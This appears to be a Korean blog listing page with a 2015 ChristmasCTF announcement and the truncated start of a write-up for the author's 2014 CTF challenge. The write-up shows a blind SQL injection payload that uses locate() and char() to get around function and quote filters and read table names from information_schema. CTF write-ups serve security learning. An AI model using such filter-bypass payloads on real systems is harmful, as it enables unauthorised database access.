ChristmasCTF2 2015 ChristmasCTF 12월 25일 크리스마스에 열리는 ChristmasCTF가 오늘기준으로 일주일 남았습니다.올해에도 재미있는 문제들 많이 준비했으니 많은 참여바랍니다.접수페이지 : http://christmasctf.com 2015. 12. 18. [2014 ChristmasCTF] 산타의 일기장 풀이 요번 ChristmasCTF 에 출제한 산타의 일기장 문제 풀이를 작성합니다.먼저 주어진 페이지에 들어가보면 게시판이 하나 존재합니다.view.php 에서 Blind SQL Injection이 가능합니다.대부분의 함수들을 필터링하고 있고 싱글쿼터또한 필터링하고 있습니다.하지만 locate함수와 char함수는 필터링하지 않으므로 0 or locate(char(97),(select table_name from information_schema.tables where table_schema=database() limit 0,1))=10 or locate(char(98),(select table_name from information_schema.tables where table_schema=database().. 2014. 12. 25. 이전 1 다음
